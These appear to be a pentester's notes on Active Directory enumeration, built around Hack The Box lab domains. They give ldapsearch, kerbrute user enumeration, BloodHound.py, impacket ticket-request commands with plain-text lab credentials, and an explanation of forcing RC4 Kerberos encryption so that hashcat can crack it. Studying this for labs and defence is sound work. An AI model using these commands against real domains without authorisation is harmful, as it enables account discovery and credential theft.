
AD Enumeration TOOL

Tools

Ldapsearch

(https://devconnected.com/how-to-search-ldap-using-ldapsearch-examples/) (https://devconnected.com/how-to-setup-openldap-server-on-debian-10/)

HackTricks Offensive WMI - Active Directory Enumeration (Part 5)

  • -LLL: shorten output (LDIF without comments and without the version line)

  • -x: simple authentication (password)

  • -H: LDAP URI, i.e. hostname with protocol

    • -h: IP address (older form)

  • -D: Bind DN

    • A Windows userPrincipalName (user@domain) is also accepted.

  • -w: password

  • -b: base DN to search from


nmap scripts for LDAP

locate -r nse$|grep ldap
/usr/share/nmap/scripts/ldap-brute.nse
/usr/share/nmap/scripts/ldap-novell-getpass.nse
/usr/share/nmap/scripts/ldap-rootdse.nse
/usr/share/nmap/scripts/ldap-search.nse

ldap example

ldapsearch -x -H ldap://sizzle.htb.local -s base namingcontexts
ldapsearch -x -H ldap://sizzle.htb.local -s sub -b 'DC=HTB,DC=LOCAL'

Dumping only admins (filter on group membership), or users in general:

ldapsearch -x -H ldap://sizzle.htb.local -D 'amanda@htb.local' -w 'Ashare1972' -b 'dc=htb,dc=local' \
'(&(ObjectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))'
ldapsearch -LLL -x -H ldap://pdc01.lab.ropnop.com -b '' -s base '(objectclass=*)'

kerbrute

username Enum

kerbrute --dc 10.10.10.240 -d licordebellota.htb userenum user.txt --downgrade

Downgrade means downgrading the Kerberos encryption type. When Kerberos picks the type, the default is 23 (RC4); often 18 (AES256) is chosen instead, which is the stronger type and one hashcat is unable to crack.

In an AD environment the type cannot simply be switched from 23 to 18, because not every application supports 18. So a group policy is set to prefer 18 for any application and to fall back to 23 only where the application does not support 18. Often a group policy is also set to monitor use of type 23 (who is still using it), to catch malicious use.


Bloodhound.py

KRB5CCNAME=d.klay.ccache bloodhound-python -u d.klay -p 'Darkmoonsky248girl' -k -ns 10.10.11.181 -d absolute.htb -dc dc.absolute.htb -c ALL --zip

impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl' -dc-ip 10.10.11.181

To delete the DB, run this Cypher query in Neo4j and restart BloodHound:

MATCH (n) OPTIONAL MATCH (n)-[r]-() DELETE n,r

Get a ticket

kinit d.klay@ABSOLUTE.HTB
klist

Sometimes it is hard to get a ticket (Kerberos only cares about two things: time and auth creds), so sync the clock with the DC:

ntpdate -s <dc-name-or-ip>

Impacket-getST-Creds

impacket-getST -spn cifs/hope.windcorp.htb -dc-ip 192.168.0.2 -debug 'windcorp.htb/ray.duncan:pantera'

Topics

DNS

  • AD DS relies heavily on DNS, especially SRV records for service discovery. The most useful and common ones:

dig -t SRV _gc._tcp.lab.ropnop.com         # Global Catalog
dig -t SRV _ldap._tcp.lab.ropnop.com
dig -t SRV _kerberos._tcp.lab.ropnop.com
dig -t SRV _kpasswd._tcp.lab.ropnop.com
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='lab.ropnop.com'"

Domain Metadata Through LDAP

  • domainFunctionality

  • forestFunctionality

  • domainControllerFunctionality

Value  Forest        Domain             Domain Controller
0      2000          2000 Mixed/Native  2000
1      2003 Interim  2003 Interim       N/A
2      2003          2003               2003
3      2008          2008               2008
4      2008 R2       2008 R2            2008 R2
5      2012          2012               2012
6      2012 R2       2012 R2            2012 R2
7      2016          2016               2016
ldapsearch -LLL -x -H ldap://pdc01.lab.ropnop.com -b '' -s base '(objectclass=*)'
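Added example (not part of the original notes): a small parser for the LDIF that the rootDSE query above prints, mapping the three *Functionality attributes to the table. The sample LDIF is constructed for the lab.ropnop.com host named on this page, not captured from a real DC; pipe real ldapsearch output into parse_ldif instead.

```python
"""Decode AD functional levels from ldapsearch rootDSE output (LDIF)."""
import base64
import re

# Functional-level values -> Windows Server version (the table above).
FUNCTIONAL_LEVELS = {0: "2000", 1: "2003 Interim", 2: "2003", 3: "2008",
                     4: "2008 R2", 5: "2012", 6: "2012 R2", 7: "2016"}
LEVEL_ATTRS = ("domainFunctionality", "forestFunctionality",
               "domainControllerFunctionality")

# Constructed sample of the rootDSE query's output; not captured from a real DC.
SAMPLE_ROOTDSE = """\
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
namingContexts: DC=lab,DC=ropnop,DC=com
namingContexts: CN=Configuration,DC=lab,DC=ropnop,DC=com
dnsHostName: pdc01.lab.ropnop.com
"""

def parse_ldif(text):
    """Return {attribute: [values]} for one LDIF entry (folded lines, '#'
    comments and '::' base64 values handled as ldapsearch emits them)."""
    lines = []
    for line in text.splitlines():
        if line.startswith(" ") and lines:
            lines[-1] += line[1:]            # fold continuation onto previous line
        elif line and not line.startswith("#"):
            lines.append(line)
    entry = {}
    for line in lines:
        m = re.match(r"^([A-Za-z][\w;.-]*):(:?) ?(.*)$", line)
        if not m:
            continue                         # not an 'attr: value' line
        attr, is_b64, value = m.groups()
        if is_b64:
            value = base64.b64decode(value).decode("utf-8", "replace")
        entry.setdefault(attr, []).append(value)
    return entry

def functional_levels(entry):
    """Map the *Functionality attributes to version names from the table."""
    out = {}
    for attr in LEVEL_ATTRS:
        raw = entry.get(attr, [None])[0]     # attribute may be absent
        out[attr] = ("missing" if raw is None
                     else FUNCTIONAL_LEVELS.get(int(raw), f"unknown ({raw})"))
    return out
```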

MS-RPC

samba

  • rpcclient

  • smbclient

  • net

  • Impacket [ropnop binaries are also good]


Ldap

Ports: 389 LDAP, 636 LDAPS (SSL), 3269 LDAP Global Catalog. Best is to confirm with nmap.
